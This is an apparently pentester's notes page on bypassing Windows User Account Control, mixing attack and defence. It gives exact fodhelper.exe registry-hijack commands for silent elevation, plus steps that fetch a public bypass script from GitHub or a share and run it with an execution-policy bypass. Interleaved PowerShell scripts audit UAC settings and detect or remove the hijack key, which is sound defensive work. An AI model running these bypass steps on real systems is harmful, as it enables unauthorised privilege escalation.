User Account Control (UAC) Bypass

Privilege escalation techniques on Windows by bypassing User Account Control (UAC).

Windows generates an access token that describes the security context when a user successfully logs in. The information in the token includes the identity and privileges of the user account associated with the process or thread. Tokens have a unique security identifier (SID). SIDs are managed by the Windows Local Security Authority.

The Windows integrity mechanism uses integrity levels to restrict what less trustworthy applications can do, even when they run under the same user account as more trusted ones.

  • 0x0000, Untrusted level
  • 0x1000 (S-1-16-4096), Low integrity level, restricted rights (sandboxed processes)
  • 0x2000 (S-1-16-8192), Medium integrity level, standard user rights
  • 0x3000 (S-1-16-12288), High integrity level, administrative rights
  • 0x4000 (S-1-16-16384), System integrity level, system rights

UAC Bypass techniques target specific OS versions.

See PowerUp.

Current user integrity level

whoami /groups

Check UAC

If EnableLUA is 0x1, it means that UAC is enabled.

reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\
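The two checks above (current integrity level and UAC configuration) can be combined into one audit script. This is an added example, not code from the original page: it parses the whoami output for the S-1-16 mandatory label and reads the UAC policy values from the same registry key, then lists the settings that would let an auto-elevating binary such as fodhelper.exe run without a prompt. Function names are my own; the registry value names are the real ones Windows uses.

```powershell
# Added example, not code from the original page: report the current process integrity
# level and the UAC policy values that decide whether auto-elevating binaries prompt.
# Uses only built-in tools (whoami.exe and the registry provider); no parameters needed.

function Get-CurrentIntegrityLevel {
    # whoami lists the token's mandatory label as a group whose SID is S-1-16-<RID>;
    # the RID is the integrity level (0x1000 Low, 0x2000 Medium, 0x3000 High, ...).
    $label = whoami /groups /fo csv | ConvertFrom-Csv |
        Where-Object { $_.SID -like 'S-1-16-*' } | Select-Object -First 1
    $rid   = [int](($label.SID -split '-')[-1])
    $names = @{ 0 = 'Untrusted'; 4096 = 'Low'; 8192 = 'Medium'; 12288 = 'High'; 16384 = 'System' }
    $level = if ($names.ContainsKey($rid)) { $names[$rid] } else { 'Unknown' }
    [pscustomobject]@{
        SID   = $label.SID
        Rid   = '0x{0:X4}' -f $rid
        Level = $level
    }
}

function Get-UacPosture {
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $p   = Get-ItemProperty -Path $key

    # A value that is absent from the key means the Windows default applies.
    $enableLua   = if ($null -ne $p.EnableLUA) { $p.EnableLUA } else { 1 }
    $adminPrompt = if ($null -ne $p.ConsentPromptBehaviorAdmin) { $p.ConsentPromptBehaviorAdmin } else { 5 }
    $secureDesk  = if ($null -ne $p.PromptOnSecureDesktop) { $p.PromptOnSecureDesktop } else { 1 }
    $tokenFilter = if ($null -ne $p.LocalAccountTokenFilterPolicy) { $p.LocalAccountTokenFilterPolicy } else { 0 }

    $findings = New-Object System.Collections.Generic.List[string]
    if ($enableLua -eq 0) {
        $findings.Add('EnableLUA=0: UAC is disabled; administrators always run at High integrity.')
    }
    if ($adminPrompt -eq 0) {
        $findings.Add('ConsentPromptBehaviorAdmin=0: elevation never prompts.')
    } elseif ($adminPrompt -ne 2) {
        # Only "Always notify" (2) disables auto-elevation of signed Windows binaries.
        $findings.Add("ConsentPromptBehaviorAdmin=$adminPrompt" + ': autoElevate binaries (e.g. fodhelper.exe) elevate silently; 2 (Always notify) prompts for them too.')
    }
    if ($secureDesk -eq 0) {
        $findings.Add('PromptOnSecureDesktop=0: prompts appear on the normal desktop instead of the secure desktop.')
    }
    if ($tokenFilter -eq 1) {
        $findings.Add('LocalAccountTokenFilterPolicy=1: local admins get an unfiltered token for network access (admin shares).')
    }

    [pscustomobject]@{
        EnableLUA                     = $enableLua
        ConsentPromptBehaviorAdmin    = $adminPrompt
        PromptOnSecureDesktop         = $secureDesk
        LocalAccountTokenFilterPolicy = $tokenFilter
        Findings                      = $findings.ToArray()
    }
}

Get-CurrentIntegrityLevel | Format-List
Get-UacPosture | Format-List
```

Run it once from the normal shell and once from the shell opened with -Verb runAs: the first should report Medium, the second High, while the UAC posture is the same in both. The finding on ConsentPromptBehaviorAdmin is the one that matters for the rest of this page: the Group Policy setting "User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode" set to "Prompt for consent on the secure desktop" (the "Always notify" slider position) makes fodhelper.exe and the other autoElevate binaries prompt like everything else.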

Open command prompt with high integrity level

powershell.exe Start-Process cmd.exe -Verb runAs

Manual Bypass – Full File System Access (read/write)

Not working…

net use Z: \\127.0.0.1\c$
cd c$

Working 🙂

dir \\127.0.0.1\c$\Users\Administrator\Desktop

Manual Bypass

Search for known exploits against the specific OS version and see which process looks vulnerable.

Inspect application manifest

Use sigcheck from Sysinternals (-a: extended information, -m: dump the embedded manifest).

sigcheck.exe -accepteula -a -m C:\Windows\System32\<vulnerable process>
sigcheck.exe -a -m C:\Windows\System32\winSAT.exe | findstr /i admin
sigcheck.exe -a -m C:\Windows\System32\winSAT.exe | findstr /i elevate

Look for:

<requestedExecutionLevel level="requireAdministrator" />
<autoElevate>true</autoElevate>

Inspect Process

Use procmon from SysInternals.

procmon.exe -accepteula

Set Filter to:

Process Name   is         <vulnerable process>
Operation      contains   Reg
Result         is         NAME NOT FOUND
Path           contains   HKCU

Add the registry key. See fodhelper example.

Bypass UAC with fodhelper.exe

fodhelper.exe runs with high integrity level on Windows 10. It uses registry keys that can be modified without administrative privileges.

Elevate integrity level from Medium to High

Affected versions: Windows 10 1709, Windows 10.0.15063 (WHEN WAS IT FIXED?)

You need to be logged in as a member of the Administrators group. fodhelper.exe is marked autoElevate, so it runs as administrator without a consent prompt.

List registry (recursively)

reg query HKCU\Software\Classes\ms-settings\Shell\Open /s

Add the missing registry keys

REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ

Assign an executable in the registry key

REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f

Start fodhelper, and a command prompt with High integrity opens without a consent prompt.

C:\Windows\System32\fodhelper.exe
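From the defender's side, the registry keys added above are the artefact to look for. The following is an added example, not code from the original page or from any tool it mentions: it checks every loaded user hive for the ms-settings\Shell\Open\command key that the fodhelper technique plants, reports the command and whether DelegateExecute is set, and can remove the key. A default profile has no ms-settings key under HKCU\Software\Classes at all (the real one lives under HKLM), so any hit is suspicious. The function name and the -Remove switch are my own.

```powershell
# Added example, not code from the original page: audit loaded user hives for the
# ms-settings\Shell\Open\command hijack key used by the fodhelper bypass.
# Assumption: each loaded profile's per-user Classes hive is mounted at
# HKEY_USERS\<SID>_Classes, which is where HKCU\Software\Classes is linked to.
# Run elevated to see every loaded hive; unelevated, only your own hive is readable.

function Find-MsSettingsHijack {
    param([switch]$Remove)   # delete the Open key (and everything under it) when found

    $hits = @()
    $classHives = Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
        Where-Object { $_.PSChildName -match '^S-1-5-21-.*_Classes$' }

    foreach ($hive in $classHives) {
        $openKey = "Registry::HKEY_USERS\$($hive.PSChildName)\ms-settings\Shell\Open"
        $cmdKey  = "$openKey\command"
        if (-not (Test-Path -LiteralPath $cmdKey)) { continue }

        # The bypass stores the payload in the key's default value and adds an empty
        # DelegateExecute value so the shell runs the command directly.
        $props   = Get-ItemProperty -LiteralPath $cmdKey -ErrorAction SilentlyContinue
        $command = $props.'(default)'
        $hasDelegate = $null -ne $props.PSObject.Properties['DelegateExecute']

        $removed = $false
        if ($Remove) {
            Remove-Item -LiteralPath $openKey -Recurse -Force
            $removed = $true
        }

        $hits += [pscustomobject]@{
            Hive            = $hive.PSChildName
            Command         = $command
            DelegateExecute = if ($hasDelegate) { 'present' } else { 'absent' }
            Removed         = $removed
        }
    }
    return $hits
}

# Report only; add -Remove to clean up what it finds.
Find-MsSettingsHijack | Format-Table -AutoSize
```

An empty result is the expected state. For continuous detection rather than a one-off sweep, log registry value writes under \ms-settings\Shell\Open\command (Sysmon Event ID 12/13 with a matching TargetObject filter) and process creations whose parent image is fodhelper.exe, and alert when the two occur within the same session: that sequence is exactly the three steps listed above.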

Using exploit

Not tested, but Metasploit module is based on this.

wget https://raw.githubusercontent.com/winscripting/UAC-bypass/master/FodhelperBypass.ps1
copy \\x.x.x.x\myshare\FodhelperBypass.ps1 FodhelperBypass.ps1
powershell -exec bypass
Import-Module .\FodhelperBypass.ps1
FodhelperBypass -program "cmd.exe"